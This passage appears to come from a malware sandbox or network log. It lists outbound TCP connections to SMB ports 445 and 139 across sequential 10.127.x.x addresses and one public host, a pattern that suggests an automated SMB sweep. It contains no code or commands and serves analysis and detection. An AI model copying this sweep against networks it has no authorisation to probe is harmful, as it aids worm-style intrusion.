| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.255:139 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.1.0:139 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.1:139 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.2:139 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.3:139 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.4:139 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.5:139 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.6:139 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.7:139 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.8:139 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.9:139 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.10:139 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.11:139 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.12:139 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.13:139 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.14:139 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.15:139 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.16:139 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.17:139 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.18:139 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.19:139 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.20:139 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.21:139 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.22:139 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.23:139 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.24:139 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.25:139 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.26:139 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.27:139 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.28:139 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.29:139 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.30:139 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.31:139 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.32:139 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.33:139 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.34:139 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.35:139 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.36:139 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.37:139 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.38:139 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.39:139 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.40:139 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.41:139 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.42:139 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.1.43:139 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.44:139 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.45:139 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| DE | 136.243.76.21:445 | tcp | |
| N/A | 10.127.1.46:139 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.47:139 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.48:139 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.49:139 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.50:139 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.51:139 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.52:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.53:139 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.54:139 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.55:139 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.1.56:139 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.57:139 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.58:139 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.1.59:139 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.60:139 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.61:139 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.62:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.63:139 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.64:139 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.65:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.66:139 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.67:139 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.68:139 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.1.69:139 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.70:139 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.71:139 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.1.72:139 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.73:139 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.74:139 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.75:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.76:139 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.77:139 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.78:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.79:139 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.80:139 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.81:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.82:139 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.83:139 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.84:139 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.1.85:139 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.86:139 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.87:139 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.88:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.89:139 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.90:139 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.91:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.92:139 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.93:139 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.94:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.95:139 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.96:139 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.97:139 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.1.98:139 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.99:139 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.100:139 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.1.101:139 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.102:139 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.103:139 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.104:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.105:139 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.106:139 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.107:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.108:139 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.109:139 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.110:139 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.1.111:139 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.112:139 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.113:139 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.1.114:139 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.115:139 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.116:139 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.117:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.118:139 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.119:139 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.120:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.121:139 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.122:139 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.123:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.124:139 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.125:139 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.126:139 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.1.127:139 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.128:139 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.129:139 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.1.130:139 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.131:139 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.132:139 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.133:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.134:139 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.135:139 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.136:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.137:139 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.138:139 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.139:139 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.1.140:139 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.141:139 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.142:139 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.143:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.144:139 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.145:139 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.146:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.147:139 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.148:139 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.149:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.150:139 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.151:139 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.152:139 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.1.153:139 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.154:139 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.155:139 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.1.156:139 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.157:139 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.158:139 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.159:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.160:139 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.161:139 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.162:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.163:139 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.164:139 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.165:139 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.1.166:139 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.167:139 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.168:139 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.1.169:139 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
